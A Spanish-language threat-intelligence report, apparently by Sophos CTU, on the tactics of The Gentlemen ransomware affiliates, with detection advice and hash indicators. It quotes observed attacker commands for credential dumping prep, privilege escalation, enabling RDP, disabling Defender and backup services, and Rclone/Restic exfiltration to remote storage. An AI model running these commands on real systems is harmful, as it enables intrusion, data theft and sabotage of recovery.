Saltar a contenido

Comportamiento poco caballeroso: detalles sobre una operación de ransomware

El análisis de 15 intrusiones reveló las técnicas utilizadas por los afiliados de GOLD SHERWOOD

Los investigadores de Counter Threat Unit™ (CTU) identificaron un guion de actuación tras la explotación que los afiliados de The Gentlemen utilizan de forma sistemática en su esquema de ransomware como servicio (RaaS). Los investigadores de CTU™ siguen la pista de este grupo de amenazas como GOLD SHERWOOD. La rápida escalada de privilegios, el uso adaptativo de herramientas y la evasión agresiva de las defensas permiten a los atacantes desplegar el ransomware poco después del acceso inicial, a veces en las 24 horas siguientes a la primera actividad identificada tras el compromiso del sistema. Los afiliados aprovechan herramientas legítimas y credenciales comprometidas para evitar la detección y acelerar el impacto. Las organizaciones deberían dar prioridad al refuerzo de la seguridad de los servicios de acceso remoto, aplicar la autenticación multifactorial (MFA), supervisar la actividad administrativa y detectar el uso anómalo de herramientas de exfiltración de datos y directorios intermedios.

Análisis

GOLD SHERWOOD comenzó a operar el esquema RaaS  The Gentlemen a mediados de 2025 como un modelo de doble extorsión, en el que los afiliados roban datos para retenerlos a cambio de un rescate antes de cifrar los archivos. Los ciberdelincuentes publicaron los nombres de las víctimas por primera vez en un sitio web dedicado a filtraciones en septiembre de 2025. Ese mismo mes, apareció en el foro clandestino RAMP un anuncio en el que los operadores reclutaban afiliados a cambio de un generoso reparto del rescate al 90/10. Durante el resto de 2025 publicaron menos de 20 nombres de víctimas al mes, pero la media subió a más de 75 a principios de 2026 (véase la figura 1). Este cambio sugiere que el número de afiliados activos aumentó durante este periodo. A finales de julio de 2026, habían añadido un total de 683 nombres de víctimas al sitio de filtraciones. Solo en julio se registraron 169 de estas víctimas, lo que lo convirtió en el sitio de filtraciones más activo de ese mes.

Bar chart comparing the number of victims published to The Gentlemen leak site from September 2025 through July 2026

Figura 1: número de víctimas que aparecieron en el sitio de filtraciones de «The Gentlemen» por mes, desde septiembre de 2025 hasta julio de 2026

La victimología de «The Gentlemen» RaaS es típica de una organización ciberdelictiva oportunista. Las víctimas mencionadas representan una amplia variedad de sectores (véase la Figura 2), lo que sugiere que los afiliados atacan a las organizaciones basándose únicamente en el acceso que tienen disponible.Figura 1: número de víctimas que aparecieron en el sitio de filtraciones de «The Gentlemen» por mes, desde septiembre de 2025 hasta julio de 2026

La victimología de «The Gentlemen» RaaS es típica de una organización ciberdelictiva oportunista. Las víctimas mencionadas representan una amplia variedad de sectores (véase la Figura 2), lo que sugiere que los afiliados atacan a las organizaciones basándose únicamente en el acceso que tienen disponible.

Chart showing sector distribution of victims named on The Gentlemen leak site

Figura 2: porcentaje de víctimas del ransomware «The Gentlemen» por sector

En consonancia con el aumento de víctimas publicadas a principios de 2026, los analistas de Sophos observaron el primer intento de despliegue del ransomware The Gentlemen contra un cliente de Sophos. El análisis de la CTU de 15 incidentes distintos proporcionó información sobre las tácticas, técnicas y procedimientos (TTP) que los atacantes emplearon en las intrusiones en la red del ransomware The Gentlemen.

Acceso inicial

Varios informes de terceros sugieren que los afiliados de The Gentlemen se valen de la explotación de vulnerabilidades en firewalls y del uso indebido de credenciales de servicios VPN para acceder a los entornos de las víctimas. Por ejemplo, en marzo, Group-IB describió cómo los afiliados llevaban a cabo operaciones de reconocimiento para identificar interfaces de gestión de firewalls FortiGate expuestas a Internet y vulnerables a CVE-2024-55591. En mayo, unos registros filtrados de Rocket Chat mostraron que el grupo probaba credenciales robadas en varios servicios de VPN. Los investigadores de CTU identificaron indicios en varias intrusiones que sugerían que los atacantes podrían haber aprovechado terminales de Fortinet para el acceso inicial, pero no pudieron confirmarlo a partir de la telemetría disponible.

En un incidente ocurrido en febrero, un actor malicioso consiguió acceso inicial al entorno de una víctima usando credenciales de usuario comprometidas para autenticarse en un servicio de VPN SSL de Fortinet. La conexión se originó desde una dirección IP externa geolocalizada en los Países Bajos y dio lugar a la asignación de una dirección VPN interna. La ausencia de autenticación multifactorial (MFA) permitió al actor obtener acceso mediante las credenciales robadas o conseguidas por fuerza bruta. En la hora inmediatamente posterior al acceso, el actor malintencionado estableció varias sesiones de VPN desde diferentes direcciones IP extranjeras, lo que indica redundancia operativa en una fase temprana y validación del acceso.

Movimiento lateral

En el incidente de febrero, el atacante inició el movimiento lateral a través del Protocolo de Escritorio Remoto (RDP), autenticándose en rápida sucesión en varios sistemas internos con credenciales válidas del dominio. Entre estos sistemas había un servidor de archivos y controladores de dominio. El atacante mantuvo un acceso persistente mediante repetidos inicios de sesión en la VPN y aprovechó las credenciales legítimas para continuar con el movimiento lateral.

Preparación y ejecución de herramientas

En varios incidentes que los investigadores de la CTU analizaron, los atacantes prepararon herramientas en el directorio C:\PerfLogs. Este directorio legítimo del sistema de Windows suele contener registros de supervisión del rendimiento. No suele ser objeto de un escrutinio minucioso por parte de los controles de seguridad ni de los administradores, lo que lo convierte en un escondite eficaz para binarios maliciosos. Los archivos preparados incluían herramientas de exfiltración de datos y de copias de seguridad, programas para desactivar soluciones de detección y respuesta en endpoints (EDR) y sus controladores vulnerables, así como herramientas de descubrimiento.

Detección, acceso a credenciales y escalada de privilegios

En varias intrusiones observadas, los actores maliciosos usaron Advanced IP Scanner para enumerar la red. En un incidente, el actor malicioso ejecutó SoftPerfect Network Scanner varias veces en numerosos servidores como preparación para el movimiento lateral y la exfiltración de datos. Su uso sugiere que el actor malicioso conocía la infraestructura de copias de seguridad de la organización y los repositorios de datos críticos.

Para prepararse para la recopilación de credenciales, los autores de la amenaza obtuvieron el identificador de proceso (PID) del Servicio del Subsistema de Autoridad de Seguridad Local (LSASS) mediante el siguiente comando:

tasklist /v /fo csv | findstr /i "lsass"

A continuación, el PID puede ser objetivo de herramientas de extracción de credenciales como Mimikatz. Aunque estas herramientas no aparecieron en la telemetría de Sophos, investigaciones de terceros confirman el uso de Mimikatz para recopilar credenciales en un ataque del ransomware The Gentlemen.

Para la escalada de privilegios, los atacantes manipulan directamente las pertenencias a grupos locales y de dominio mediante utilidades administrativas nativas de Windows (véase la Tabla 1).

ComandoPropósito
net1 localgroup administrators itadmin /addAñade cuentas controladas por el atacante al grupo local de Administradores
net group "domain admins" ldap /add /domainEscala los privilegios al nivel de administrador de dominio
net user administrator qwertyu1 /domainRestablece las credenciales de cuentas de alto valor

Tabla 1: comandos utilizados para la escalada de privilegios

En un incidente, el actor malicioso cambió la contraseña de dos cuentas de nivel de administrador. Este cambio garantizó el acceso al atacante y limitó los intentos que los defensores de la red pudieran realizar para solucionar la intrusión.

Persistencia

Los investigadores de la CTU observaron que los atacantes utilizaban diversos métodos para mantener la persistencia tras conseguir acceso a la red. En un incidente, el actor malicioso utilizó una cuenta de administrador comprometida para instalar un agente de Cloudflared como servicio de Windows. El atacante configuró el servicio para ejecutar el túnel cloudflared.exe mediante un token de autenticación válido. Esta acción proporcionó al atacante un canal de acceso remoto oculto y resistente, independiente de la conexión VPN que había utilizado inicialmente para acceder.

En otro incidente, el actor malicioso utilizó la herramienta Datto RMM. Sin embargo, la telemetría disponible no dejó claro cómo facilitó esta herramienta el ataque. El atacante solo la implementó en un dispositivo comprometido y los investigadores no observaron ninguna otra actividad maliciosa en ese dispositivo.

En al menos cuatro incidentes, el atacante intentó establecer un acceso persistente a través de RDP, primero modificando el registro para habilitar el protocolo a nivel del sistema:

reg add HKLM\System\CurrentControlSet\Control\Terminal Server /v fDenyTSConnections /d 0 /f

A continuación, crearon una regla de firewall para abrir el puerto RDP (3389) y permitir el acceso externo:

netsh advfirewall firewall add rule name="Remote Desktop" dir=in action=allow protocol=tcp localport=3389

Estas acciones garantizaban que el atacante mantuviera el acceso interactivo a los sistemas comprometidos, incluso si configuraciones previas o medidas defensivas habían desactivado la conectividad remota.

Exfiltración

El análisis de la CTU reveló múltiples métodos de exfiltración de datos en los incidentes del ransomware The Gentlemen. Aunque los atacantes utilizaron MEGAsync y FileZilla de vez en cuando en los sistemas de las víctimas, emplearon Rclone claramente como la herramienta de exfiltración preferida, ya que los investigadores lo observaron en cinco de los incidentes.

Al usar Rclone, los atacantes incorporaban parámetros de línea de comandos para limitar el alcance de la exfiltración, probablemente con el fin de reducir el volumen de datos y el ruido. En cada incidente, los atacantes intentaron exfiltrar datos a ubicaciones remotas específicas que llevaban el nombre de la víctima. La tabla 2 enumera los comandos de Rclone observados.

Comando Descripción
rclone copy s:\ wasabi1:<remote location> --transfers 8 --max-age 4y --include-from filter.txt -pUsa transferencias de alta velocidad (ocho archivos en paralelo)Transfiere los tipos de archivos especificados en un archivo de textoTransfiere archivos con una antigüedad máxima de cuatro años
rclone copy E:\ <remote location> --transfers 8 --max-age 5y --include-from filter.txt -PUsa transferencias de alta velocidad (ocho archivos en paralelo). Transfiere los tipos de archivo especificados en un archivo de texto. Transfiere archivos que no tengan más de cinco años
rclone copy z:\ :<remote location> --include-from filter.txt -pTransfiere los tipos de archivo especificados en un archivo de texto
rclone copy ... remote:<remote location>/ -q --ignore-existingTransfiere archivos que aún no están en el servidor remoto. Se ejecuta en modo silencioso
rclone copy --filter-from filter-file.txt "\\10[.]0[.]0[.]221\D$" remote: <remote location>/ -q --ignore-existing --auto-confirm --multi-thread-streams 8 --transfers 8 --max-age 8y --progressUsa transferencias multihilo (ocho hilos) de alta velocidad (ocho archivos en paralelo). Transfiere archivos almacenados en un recurso compartido de red específico. Transfiere los tipos de archivo especificados en un archivo de texto. Transfiere archivos que aún no están en el servidor remoto. Omite las solicitudes de confirmación. Transfiere archivos que no tengan más de ocho años

Tabla 2: comandos de Rclone utilizados para la exfiltración de datos

El análisis de la CTU sobre el uso de herramientas en una sola intrusión reveló una estrategia de exfiltración de datos secuencial y adaptativa, en lugar de un flujo de trabajo fijo. El atacante utilizó el siguiente comando de Rclone al principio de la intrusión para exfiltrar datos de una unidad de red asignada (z:), lo que indica un intento de extraer datos rápidamente con una configuración mínima. A continuación, copió los datos a un endpoint de almacenamiento remoto.

rclone copy z:\ <remote location> --include-from filter.txt -p

Aproximadamente 25 minutos después, el atacante pasó a utilizar la utilidad de copia de seguridad Restic, comenzando con repetidos intentos de inicialización del repositorio:

restic init

A estos intentos les siguió la inspección de un archivo de configuración existente:

notepad.exe c:\perflogs\restic-config.bat

Posteriormente, el actor malicioso llevó a cabo operaciones de copia de seguridad iterativas con distintos parámetros:

restic backup z:\ --include-file=filter.txt
restic backup z:\ --exclude="*.exe" ...

La secuencia muestra un claro comportamiento interactivo, en el que el atacante va ajustando los criterios de inclusión y exclusión para optimizar la recopilación de datos. Este proceso sugiere que el atacante descubrió Restic en el host o lo introdujo deliberadamente como mecanismo alternativo para la preparación estructurada de datos.

Por último, el atacante utilizó una herramienta adicional (MinIO Client (mc)) para copiar datos al almacenamiento de objetos:

mc cp --recursive z:\ wasabi/...

La transición de Rclone a Restic y luego a mc indica un enfoque adaptativo para la exfiltración. Es probable que limitaciones del entorno, como el volumen de datos o el rendimiento de la transferencia, hayan influido en esta progresión.

Evasión de las defensas

Los afiliados de The Gentlemen evaden las defensas de dos formas principales. Intentan terminar procesos para desactivar soluciones antivirus (AV) y de detección y respuesta en endpoints (EDR) que podrían impedir el despliegue del ransomware. También destruyen copias de seguridad y registros para dificultar la recuperación.

Desactivación de EDR

En un informe de junio de 2026, ESET describió cómo los operadores de RaaS proporcionan a los afiliados de The Gentlemen un conjunto de herramientas personalizadas y de acceso público para desactivar EDR, que aprovechan controladores vulnerables mediante la técnica BYOVD (Bring Your Own Vulnerable Driver). Los investigadores de CTU observaron una combinación de estas herramientas en varias intrusiones (véase la Tabla 3). En un incidente, un atacante utilizó tres variantes diferentes del conjunto de herramientas personalizadas que ESET denomina GentleKiller para intentar desactivar la solución EDR.

VarianteNombres de archivoNº incidentes
GentleKiller - Watchdogbitd1.exe, bitd2.exe, bitdclear.exe, bitdlight.exe, y7d0.exe6
GentleKiller - Javelineaanticheat1.exe, eaanticheat2.exe, eaanticheatclear.exe, eaanticheatlight.exe, EASOLO1.exe, EASolo1Light.exe, EASOLO2.exe, EASOLO2clear.exe6
GentleKiller - G11g111.exe1
GentleKiller - FACEIT Anti-CheatFaceITClear.exe1
Havocacronis.exe, hwaudkiller.exe, sophos.exe, Sophos2.exe, Sophos3.exe2

Xkpsm-Killer

x.exe2

 

Tabla 3: herramientas para desactivar EDR observadas en las operaciones del ransomware The Gentlemen

Los investigadores de CTU no habían observado antes la herramienta de código abierto Xkpsm-Killer en los ataques del ransomware The Gentlemen. El atacante descargó un controlador vulnerable (xkpsm.sys) antes de utilizar un ejecutable (x.exe) para atacar los procesos de Sophos EDR en los endpoints. Las contramedidas existentes detectaron estos intentos.

Además, en varias intrusiones los atacantes utilizaron PowerShell para forzar exclusiones de supervisión en Windows Defender. Por ejemplo, el siguiente comando excluía todo un directorio (la unidad C:) del análisis, desactivando así la protección en tiempo real para todos los archivos:

powershell -command "Add-MpPreference -ExclusionPath C:\ -Force"

Otro comando ignoraba los procesos relacionados con el propio ejecutable del ransomware:

powershell -command "add-mppreference -exclusionprocess" c:\x\g_<file extension>_windows_amd64.exe -force

En otro caso de ataque, un actor malicioso adoptó un enfoque diferente y desactivó Windows Defender configurando un valor de registro de la política de Windows:

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableRealtimeMonitoring /t REG_DWORD /d 1

A continuación, el atacante ejecutó un script por lotes desde un recurso compartido del controlador de dominio, probablemente para implementar controladores firmados vulnerables con el fin de terminar los procesos de seguridad a nivel del núcleo. El uso de un script alojado en Netlogon garantizó una ejecución coherente en varios hosts:

cmd.exe /c "\\NETLOGON\avkill.bat"

Manipulación de copias de seguridad y destrucción de pruebas

Al mismo tiempo que desactivan las soluciones antivirus y EDR, los atacantes usan comandos de configuración de servicios para desactivar los servicios de copia de seguridad y recuperación, de modo que las víctimas no puedan restaurar los sistemas cifrados. Los investigadores de la CTU observaron más de 200 variaciones de este comando en los distintos incidentes, entre ellas las siguientes. Los comandos se dirigían a una amplia gama de servicios de copia de seguridad y replicación.

  • sc config VeeamBackupSvc start= disabled
  • sc config SQLWriter start= disabled
  • sc config BackupExecAgent start= disabled

Al desactivar estos servicios, el atacante se asegura de que los agentes de copia de seguridad no puedan iniciar procesos de recuperación, y de que las plataformas de copia de seguridad de la empresa dejen de ser eficaces. Este paso se producía sistemáticamente justo antes de desplegar el ransomware.

En un incidente, el atacante también borró los registros de Aplicaciones, Sistema y Seguridad en varios hosts, una medida antiforense deliberada para eliminar pruebas de actividad maliciosa. Estos registros contienen datos críticos de la actividad del sistema, como eventos de autenticación, ejecución de servicios, escalada de privilegios y creación de procesos. Al borrarlos, un atacante puede eliminar la visibilidad de etapas clave de una intrusión, como el acceso inicial, el movimiento lateral y el establecimiento de la persistencia. Esta táctica se observa habitualmente en operaciones de ransomware. Esto dificulta la respuesta ante incidentes y reduce la probabilidad de detección retrospectiva.

Ejecución e impacto

GOLD SHERWOOD proporciona ransomware personalizado a sus afiliados. Aunque existen versiones del ransomware compatibles con Windows, Linux y ESXi, los investigadores de CTU solo observaron la variante para Windows implementada en los incidentes analizados. Los atacantes descargaron la variante compatible con ESXi en un incidente, pero no había pruebas en la telemetría que sugirieran que la hubieran implementado en la red.

En las intrusiones observadas, los autores de las amenazas utilizaron diferentes técnicas para desplegar el ransomware localmente en hosts individuales, en recursos compartidos de red o en toda la red. Los atacantes ejecutaron binarios de tipo «locker» basados en Go cuyos nombres de archivo coinciden con los siguientes formatos:

  • locker_<file extension string>_windows_amd64.exe
  • G_<file extension string>_windows_amd64.exe
  • decryptor.exe

Los atacantes ejecutan estos binarios con parámetros de línea de comandos que determinan cómo deben comportarse:

  • --password (clave de cifrado)
  • --superfast, --ultrafast (indicadores de velocidad)
  • --keep (conservar las extensiones originales)
  • --path (para atacar sistemas remotos a través de rutas UNC, p. ej., \\<dirección IP>\c$\users, \\<dirección IP>\d$)

Los mecanismos de despliegue incluyen la ejecución local directa desde directorios intermedios (p. ej., C:\PerfLogs\ o C:\Users\<nombre de usuario>\Documents\AVAST2\), el movimiento lateral a través de PsExec y la distribución en todo el dominio mediante recursos compartidos de NETLOGON (p. ej., \\<organización afectada>.local\NETLOGON\decryptor.exe).

Cuando los atacantes ejecutan el ransomware, este cifra los archivos y les asigna una extensión de seis caracteres que suele incluirse en el nombre del binario del ransomware. Además, colocan notas de rescate llamadas README-GENTLEMEN.txt en todos los directorios afectados (véase la figura 3).

Screenshot of ransom note sample dropped by The Gentlemen ransomware

Figura 3: ejemplo de nota de rescate de The Gentlemen (README-GENTLEMEN.txt)

Aunque no podemos determinar los tiempos de permanencia exactos (el tiempo que transcurre entre el acceso inicial y el despliegue del ransomware) en todos los incidentes, algunos afiliados de The Gentlemen actúan con rapidez. La media del tiempo transcurrido entre la primera actividad observada tras el compromiso y el despliegue del ransomware fue de aproximadamente dos días. El tiempo de permanencia más corto fue de menos de 24 horas.

Conclusión

Los investigadores de la CTU analizaron las intrusiones del ransomware The Gentlemen y observaron un patrón de actuación repetible por parte de los afiliados que combina un acceso inicial oportunista, una rápida escalada de privilegios, mecanismos legítimos de acceso remoto, la colocación de herramientas en rutas de sistema de confianza, la exfiltración selectiva de datos, la evasión agresiva de las defensas, la interrupción de las copias de seguridad y el despliegue del ransomware. Los afiliados actúan con flexibilidad: usan utilidades nativas de Windows, herramientas comerciales y de código abierto, «EDR killers» basados en BYOVD y la manipulación de los servicios de copias de seguridad para adaptarse a los entornos de las víctimas y maximizar el impacto antes del cifrado. Aparte de los «EDR killers» y los binarios del ransomware, los investigadores de la CTU no detectaron ningún uso de malware en las intrusiones.

Las organizaciones pueden reducir su vulnerabilidad ante estas técnicas aplicando la autenticación multifactorial (MFA) para los servicios de VPN y acceso remoto, aplicando rápidamente parches a los firewalls y dispositivos de VPN conectados a Internet, restringiendo y supervisando los cambios en los grupos administrativos, limitando la exposición al RDP y activando alertas ante cambios sospechosos en el registro, el firewall y las exclusiones de Windows Defender. Las organizaciones también deberían supervisar ejecuciones inusuales desde C:\PerfLogs y directorios de preparación similares; detectar el uso de herramientas de exfiltración como Rclone, Restic, FileZilla, MEGAsync y MinIO Client; proteger las plataformas de copias de seguridad contra cambios no autorizados en los servicios; e investigar los intentos de desactivar herramientas de seguridad, borrar registros o instalar controladores vulnerables.

Contramedidas e indicadores

Las siguientes contramedidas de Sophos están relacionadas con esta amenaza:

  • ATK/KillAV-ENI
  • ATK/KillAV-HID
  • ATK/KillAV-HWA
  • ATK/KillAV-NC
  • ATK/KillAV-SKY
  • ATK/KillAV-SKZ
  • ATK/KillAV-SOP
  • Creds_4i
  • CXrep/MalGo-B
  • Evade_40g
  • Evade_66a
  • Prevent_2a
  • Troj/ABYSSW-B
  • Troj/HCrypt-E
  • W32/Neshta-D

Los indicadores de amenaza de la Tabla 4 pueden detectar actividad relacionada con esta amenaza.

IndicadorTipoContexto
622b2ca08552535bc142cb815ff9ec16MD5 hashEDR killer utilizado en los ataques de The Gentlemen (acronis.exe)
f0bc50d2d2838c5294e21cd9bce2f09bf581e508SHA1 hashEDR killer utilizado en los ataques de The Gentlemen (acronis.exe)
a348f5fa048a09188bd706fd3d4efca978990caf3355ecfee501c9f1e19c0efdSHA256 hashEDR killer utilizado en los ataques de The Gentlemen (acronis.exe)
4741a4976c6abfb3c80c170104518b6eMD5 hashEDR killer utilizado en los ataques de The Gentlemen (acronis.exe)
be8c52474ab79a52af31e3cb2f71638299a0de1dSHA1 hashEDR killer utilizado en los ataques de The Gentlemen (acronis.exe)
ddba5b4e7a7ada77d56477e9d41c008f93e81d9a33ed09e77cb2af624fa694feSHA256 hashEDR killer utilizado en los ataques de The Gentlemen (acronis.exe)
738df7ae0097f6bef93d65be5d4a2a26MD5 hashEDR killer utilizado en los ataques de The Gentlemen (acronis.exe, hwaudkiller.exe)
c96baab9b7e7ef661921d44d7900f165c794ed25SHA1 hashEDR killer utilizado en los ataques de The Gentlemen (acronis.exe, hwaudkiller.exe)
1a9291ec869155336bf185d221d655d11c77a55ea0c8ecc0274202f74a90fcd1SHA256 hashEDR killer utilizado en los ataques de The Gentlemen (acronis.exe, hwaudkiller.exe)
d8691ef15eea27cfefafeeb485286080MD5 hashEDR killer utilizado en los ataques de The Gentlemen (y7D0.exe)
8bca55b3c9bfbdf68c9b6c72a7b1bf1dd6d5e3b2SHA1 hashEDR killer utilizado en los ataques de The Gentlemen (y7D0.exe)
3c71537b64487bbf4d1793f72c75d332650d09a77b71e4d884ff15c266a847f6SHA256 hashEDR killer utilizado en los ataques de The Gentlemen (y7D0.exe)
b23b653541bd95bdc4da07a0b07b57bfMD5 hashEDR killer utilizado en los ataques de The Gentlemen (sophos.exe)
f0537cbb773ae12100b36731e7c39f5a9d852b14SHA1 hashEDR killer utilizado en los ataques de The Gentlemen (sophos.exe)
50f2cdf16f05da9253fa2d6eb60d5a42da14c02c551c0874c9e953d4119da69cSHA256 hashEDR killer utilizado en los ataques de The Gentlemen (sophos.exe)
bf7a2fb7f7256809dc690213b85f747cef8db7b909caf9783cac181912fb6207SHA256 hashEDR killer utilizado en los ataques de The Gentlemen (sophos2.exe)
761ce72420edf5e5531cdbad0e93397d7520cdead825886ca7f75cef76031720SHA256 hashEDR killer utilizado en los ataques de The Gentlemen (sophos3.exe)
002417da707b93bf5ce3cb26d28005f6MD5 hashEDR killer used in The Gentlemen ransomware compromises (g111.exe)
8732c1ff565828a0bdef514b5dc0dfea40c1d1f2SHA1 hashEDR killer utilizado en los ataques de The Gentlemen (g111.exe)
81053c2c3be8b7dbf7d5087dba05c940b3ee4fd95524272651c816b72c5a9443SHA256 hashEDR killer used in The Gentlemen ransomware compromises (g111.exe)
7a37acb031cddaa39ad20db0961baa5423ec53f318c49c9275c982507da76d6aSHA256 hashEDR killer utilizado en los ataques de The Gentlemen (FaceITClear.exe)
bc4a8d7bbbeb941265dfc954539326c0MD5 hashEDR killer utilizado en los ataques de The Gentlemen (eaanticheat2.exe)
b7cea81e6de895d01d01d20bd6dcfd347940b57fSHA1 hashEDR killer utilizado en los ataques de The Gentlemen (eaanticheat2.exe)
3a31ec3bf9b7eac6593a723145381f5d0f4ede076c4c8818d949a08f5596ff76SHA256 hashEDR killer utilizado en los ataques de The Gentlemen (eaanticheat2.exe)
68031d549de399a44bb00614b910106baccef5996623b2f1102352a52a5bb444SHA256 hashEDR killer utilizado en los ataques de The Gentlemen (EAAntiCheatClear.exe)
058c3ff21e79770e4a60937c27b1ede227709248SHA1 hashEDR killer utilizado en los ataques de The Gentlemen (EASOLO1.exe)
9c0b05eb75f971cc25ee979e49b227b86b19e833SHA1 hashEDR killer utilizado en los ataques de The Gentlemen (EASolo1Light.exe)
a438ba2122a814320f47a056f04122f81c2ae6c5SHA1 hashEDR killer utilizado en los ataques de The Gentlemen (EASOLO2.exe)
a8ba89e67297642dcc1ae77433ab84e1f27d1792SHA1 hashEDR killer utilizado en los ataques de The Gentlemen (EASOLO2clear.exe)
8ea97d01cbf459b94d134d05c54cd33eMD5 hashDriver vulnerable que usa el EDR killer de The Gentlemen para infectar (nogbc.sys)
5c9bf6b7e4c7dc9b9227ce86e2d271d624c35147SHA1 hashDriver vulnerable que usa el EDR killer de The Gentlemen para infectar (nogbc.sys)
0be8f415a485b11747bcfd71c9cd9781e090354728f076791ed6845b69ed78fbSHA256 hashDriver vulnerable que usa el EDR killer de The Gentlemen para infectar (nogbc.sys)
07e9f0b8627a95960e79e930fb099e84MD5 hashDriver vulnerable que usa el EDR killer de The Gentlemen para infectar (G11.sys)
56bee9df5833a637f5c54d5911df98b0812fe643SHA1 hashDriver vulnerable que usa el EDR killer de The Gentlemen para infectar (G11.sys)
2d91a78e739891c9854c254f5b2a6b84c0e167dfa253466cbccd2cdd1c20145dSHA256 hashDriver vulnerable que usa el EDR killer de The Gentlemen para infectar (G11.sys)
ccdde8091d63eaafbe30d9f0482afd245abc10ab16e21ae9254e51e42cb80ae8SHA256 hashDriver vulnerable que usa el EDR killer de The Gentlemen para infectar (dmx.sys)

Tabla 4: Indicadores de esta amenaza